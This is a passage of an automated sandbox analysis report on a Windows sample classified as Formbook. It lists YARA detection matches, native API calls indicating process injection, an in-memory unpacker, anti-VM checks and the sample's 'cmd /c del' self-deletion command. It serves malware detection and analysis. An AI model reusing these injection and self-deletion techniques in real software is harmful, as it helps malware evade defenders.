          Source: 00000004.00000000.730886485.000000000EEF1000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000000.730886485.000000000EEF1000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.763748004.00000000015D0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.763748004.00000000015D0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000008.00000002.940364992.0000000002530000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000002.940364992.0000000002530000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.695508447.00000000033A9000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.695508447.00000000033A9000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.762828125.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.762828125.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000008.00000002.939915779.0000000000500000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000002.939915779.0000000000500000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.763621485.00000000011C0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.763621485.00000000011C0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 56460021473877.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: 3.2.56460021473877.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.2.56460021473877.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.2.56460021473877.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.2.56460021473877.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.56460021473877.exe.350fe30.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.56460021473877.exe.350fe30.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.56460021473877.exe.34c5c10.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.56460021473877.exe.34c5c10.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000000.752209654.000000000EEF1000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000000.752209654.000000000EEF1000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000002.940519272.0000000002830000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000002.940519272.0000000002830000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000000.730886485.000000000EEF1000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000000.730886485.000000000EEF1000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.763748004.00000000015D0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.763748004.00000000015D0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000002.940364992.0000000002530000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000002.940364992.0000000002530000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.695508447.00000000033A9000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.695508447.00000000033A9000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.762828125.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.762828125.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000002.939915779.0000000000500000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000002.939915779.0000000000500000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.763621485.00000000011C0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.763621485.00000000011C0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: C:\Users\user\Desktop\56460021473877.exeCode function: 0_2_000480A9
          Source: C:\Users\user\Desktop\56460021473877.exeCode function: 0_2_007ECCCC
          Source: C:\Users\user\Desktop\56460021473877.exeCode function: 0_2_007EF090
          Source: C:\Users\user\Desktop\56460021473877.exeCode function: 0_2_007EF082
          Source: C:\Users\user\Desktop\56460021473877.exeCode function: 3_2_00401030
          Source: C:\Users\user\Desktop\56460021473877.exeCode function: 3_2_0041D173
          Source: C:\Users\user\Desktop\56460021473877.exeCode function: 3_2_00401175
          Source: C:\Users\user\Desktop\56460021473877.exeCode function: 3_2_0041C1FB
          Source: C:\Users\user\Desktop\56460021473877.exeCode function: 3_2_0041BBBB
          Source: C:\Users\user\Desktop\56460021473877.exeCode function: 3_2_00408C80
          Source: C:\Users\user\Desktop\56460021473877.exeCode function: 3_2_0041C50E
          Source: C:\Users\user\Desktop\56460021473877.exeCode function: 3_2_00402D8B
          Source: C:\Users\user\Desktop\56460021473877.exeCode function: 3_2_00402D90
          Source: C:\Users\user\Desktop\56460021473877.exeCode function: 3_2_00402FB0
          Source: C:\Users\user\Desktop\56460021473877.exeCode function: 3_2_00BA80A9
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04711002
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0466841F
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0466B090
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04721D55
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04650D20
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04674120
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0465F900
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0466D5E0
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04676E30
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0468EBB0
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0284BBBB
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0284C1FB
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_02832FB0
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_02838C80
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_02832D8B
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_02832D90
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0284C50E
          Source: C:\Windows\SysWOW64\control.exeCode function: String function: 0465B150 appears 32 times
          Source: C:\Users\user\Desktop\56460021473877.exeCode function: 3_2_004185C0 NtCreateFile,
          Source: C:\Users\user\Desktop\56460021473877.exeCode function: 3_2_00418670 NtReadFile,
          Source: C:\Users\user\Desktop\56460021473877.exeCode function: 3_2_004186F0 NtClose,
          Source: C:\Users\user\Desktop\56460021473877.exeCode function: 3_2_004187A0 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\56460021473877.exeCode function: 3_2_004185BB NtCreateFile,
          Source: C:\Users\user\Desktop\56460021473877.exeCode function: 3_2_0041866A NtReadFile,
          Source: C:\Users\user\Desktop\56460021473877.exeCode function: 3_2_004186EA NtClose,
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04699860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04699840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04699540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04699910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_046995D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_046999A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04699660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04699A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04699650 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_046996E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_046996D0 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04699710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04699FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04699780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0469B040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04699820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_046998F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_046998A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04699560 NtWriteFile,
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04699950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04699520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0469AD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_046995F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_046999D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04699670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04699A20 NtResumeThread,
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04699A00 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04699610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04699A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04699A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04699760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04699770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0469A770 NtOpenThread,
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04699730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04699B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0469A710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_046997A0 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0469A3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_028486F0 NtClose,
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_02848670 NtReadFile,
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_028487A0 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_028485C0 NtCreateFile,
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_028486EA NtClose,
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0284866A NtReadFile,
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_028485BB NtCreateFile,
          Source: 56460021473877.exeBinary or memory string: OriginalFilename vs 56460021473877.exe
          Source: 56460021473877.exe, 00000000.00000002.693859689.00000000007F0000.00000004.00000020.sdmpBinary or memory string: OriginalFilenameclr.dllT vs 56460021473877.exe
          Source: 56460021473877.exe, 00000000.00000002.693132347.0000000000042000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameCLSCompliantAttribu.exeD vs 56460021473877.exe
          Source: 56460021473877.exe, 00000000.00000002.699650451.0000000006C20000.00000004.00020000.sdmpBinary or memory string: OriginalFilenameUI.dll< vs 56460021473877.exe
          Source: 56460021473877.exe, 00000000.00000002.694839132.00000000023A1000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameriched20.dllp( vs 56460021473877.exe
          Source: 56460021473877.exe, 00000000.00000002.694839132.00000000023A1000.00000004.00000001.sdmpBinary or memory string: l,\\StringFileInfo\\000004B0\\OriginalFilename vs 56460021473877.exe
          Source: 56460021473877.exeBinary or memory string: OriginalFilename vs 56460021473877.exe
          Source: 56460021473877.exe, 00000003.00000002.762957590.0000000000BA2000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameCLSCompliantAttribu.exeD vs 56460021473877.exe
          Source: 56460021473877.exe, 00000003.00000002.764806655.0000000001A05000.00000040.00020000.sdmpBinary or memory string: OriginalFilenameCONTROL.EXEj% vs 56460021473877.exe
          Source: 56460021473877.exe, 00000003.00000002.764551885.00000000018BF000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs 56460021473877.exe
          Source: 56460021473877.exeBinary or memory string: OriginalFilenameCLSCompliantAttribu.exeD vs 56460021473877.exe
          Source: 56460021473877.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: 56460021473877.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: 56460021473877.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\56460021473877.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: unknownProcess created: C:\Users\user\Desktop\56460021473877.exe 'C:\Users\user\Desktop\56460021473877.exe'
          Source: C:\Users\user\Desktop\56460021473877.exeProcess created: C:\Users\user\Desktop\56460021473877.exe C:\Users\user\Desktop\56460021473877.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\control.exe C:\Windows\SysWOW64\control.exe
          Source: C:\Windows\SysWOW64\control.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\56460021473877.exe'
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\56460021473877.exeProcess created: C:\Users\user\Desktop\56460021473877.exe C:\Users\user\Desktop\56460021473877.exe
          Source: C:\Windows\SysWOW64\control.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\56460021473877.exe'
          Source: C:\Users\user\Desktop\56460021473877.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\56460021473877.exe.logJump to behavior
          Source: classification engineClassification label: mal100.troj.evad.winEXE@7/1@11/7
          Source: C:\Users\user\Desktop\56460021473877.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7024:120:WilError_01
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\Desktop\56460021473877.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: 56460021473877.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: 56460021473877.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: wntdll.pdbUGP source: 56460021473877.exe, 00000003.00000002.763826486.0000000001610000.00000040.00000001.sdmp, control.exe, 00000008.00000002.940884541.0000000004630000.00000040.00000001.sdmp
          Source: Binary string: control.pdb source: 56460021473877.exe, 00000003.00000002.764793089.0000000001A00000.00000040.00020000.sdmp
          Source: Binary string: wntdll.pdb source: 56460021473877.exe, 00000003.00000002.763826486.0000000001610000.00000040.00000001.sdmp, control.exe
          Source: Binary string: control.pdbUGP source: 56460021473877.exe, 00000003.00000002.764793089.0000000001A00000.00000040.00020000.sdmp

          Data Obfuscation:

          barindex
          .NET source code contains potential unpackerShow sources
          Source: 56460021473877.exe, MainForm.cs.Net Code: Marshaler System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 0.0.56460021473877.exe.40000.0.unpack, MainForm.cs.Net Code: Marshaler System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 0.2.56460021473877.exe.40000.0.unpack, MainForm.cs.Net Code: Marshaler System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 3.2.56460021473877.exe.ba0000.1.unpack, MainForm.cs.Net Code: Marshaler System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 3.0.56460021473877.exe.ba0000.0.unpack, MainForm.cs.Net Code: Marshaler System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: C:\Users\user\Desktop\56460021473877.exeCode function: 3_2_0041B86C push eax; ret
          Source: C:\Users\user\Desktop\56460021473877.exeCode function: 3_2_0041B802 push eax; ret
          Source: C:\Users\user\Desktop\56460021473877.exeCode function: 3_2_0041B80B push eax; ret
          Source: C:\Users\user\Desktop\56460021473877.exeCode function: 3_2_00407253 push edi; ret
          Source: C:\Users\user\Desktop\56460021473877.exeCode function: 3_2_0041B35A push ss; iretd
          Source: C:\Users\user\Desktop\56460021473877.exeCode function: 3_2_0041CEAA push FFFFFFC5h; iretd
          Source: C:\Users\user\Desktop\56460021473877.exeCode function: 3_2_0041B7B5 push eax; ret
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_046AD0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_02837253 push edi; ret
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0284B35A push ss; iretd
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0284B802 push eax; ret
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0284B80B push eax; ret
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0284B86C push eax; ret
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0284CEAA push FFFFFFC5h; iretd
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0284B7B5 push eax; ret
          Source: initial sampleStatic PE information: section name: .text entropy: 7.73073019644

          Hooking and other Techniques for Hiding and Protection:

          barindex
          Self deletion via cmd deleteShow sources
          Source: C:\Windows\SysWOW64\control.exeProcess created: /c del 'C:\Users\user\Desktop\56460021473877.exe'
          Source: C:\Windows\SysWOW64\control.exeProcess created: /c del 'C:\Users\user\Desktop\56460021473877.exe'
          Source: C:\Users\user\Desktop\56460021473877.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\56460021473877.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\56460021473877.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\56460021473877.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\56460021473877.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\56460021473877.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\56460021473877.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\56460021473877.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\56460021473877.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\56460021473877.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\56460021473877.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\56460021473877.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\56460021473877.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\56460021473877.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\56460021473877.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\56460021473877.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\56460021473877.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\56460021473877.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\56460021473877.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\56460021473877.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\56460021473877.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\56460021473877.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\56460021473877.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\56460021473877.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\56460021473877.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\56460021473877.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\56460021473877.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\56460021473877.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\56460021473877.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\56460021473877.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\56460021473877.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\56460021473877.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\56460021473877.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\56460021473877.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\control.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          barindex
          Yara detected AntiVM3Show sources
          Source: Yara matchFile source: 0.2.56460021473877.exe.23f11fc.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000000.00000002.694839132.00000000023A1000.00000004.00000001.sdmp, type: MEMORY
